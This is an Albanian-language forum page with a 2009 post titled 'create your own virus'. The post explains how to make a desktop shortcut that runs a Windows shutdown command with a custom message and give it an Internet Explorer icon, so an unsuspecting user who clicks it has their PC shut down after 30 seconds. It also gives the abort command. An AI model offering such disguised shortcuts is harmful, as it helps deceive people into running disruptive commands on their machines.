WWW.XONINET.NICETHEME.COM
July 2018
MonTueWedThuFriSatSun
      1
2345678
9101112131415
16171819202122
23242526272829
3031     

Calendar Calendar

Top posters
xoninet (330)
 
xsas (159)
 
stv2008 (56)
 
007 (10)
 
rida (7)
 
geni (3)
 
cari (1)
 
hacker (1)
 
besfort halimki (1)
 
ramizisia (1)
 

Sondazh
Statistikat
Forumi ka 74 anëtarë të regjistruar
Anëtari më i ri ardian

Anëtarët e këtij forumi kanë postuar 553 artikuj v 432 temat
identifikimi

Harrova fjalkalimin

Kërko
 
 

Display results as :
 


Rechercher Advanced Search


krijoni vet 1 virus

Shko poshtë

default krijoni vet 1 virus

Mesazh nga xoninet prej Thu 16 Apr 2009, 13:39

krijo virus D

Shkojm me anen e djatht te mausit ne Desktop .
New > Shortcut .
Pastaj te hapet nje dritare dhe e shkruan kete :
shutdown -s -t 30 -c "Mesazhi juaj ketu"
Tash e merrim naj emer te naj icone .
Psh un pe marr Internet Explore.
Pastaj te ka dal nDesktop.
Dhe me anen e djatht te mausit klikon te Properties
Dhe ja ndrron iconen ja len te internet exploreit
dhe shkojm ok edhe kryhet kur te clikojsh aty ta qet
qe mas 30 secondav te shuket PC , nese ke kliku dhe don qe mos shuket PC mas 30 sec
Hin Run : shkruje ket " Shutdown -a " pa thojza dhe clokon ok Sad

_________________
xoninet kosovë--Karaçevë
avatar
xoninet
SUPER ADMINISTRATOR 100 %
SUPER ADMINISTRATOR 100 %

Male
Numri i postimeve : 330
Sa vjeq\e jeni : 33
Nga jeni : KOSOVA
Hobi juaj : SPORT
Sheno vendodhjen tënde : këtu jam
Reputacion : 1
poenat : 343796
Data e rexhistrimit : 26/02/2009

http://xoninet.albanianforum.net

Mbrapsht në krye Shko poshtë

Mbrapsht në krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi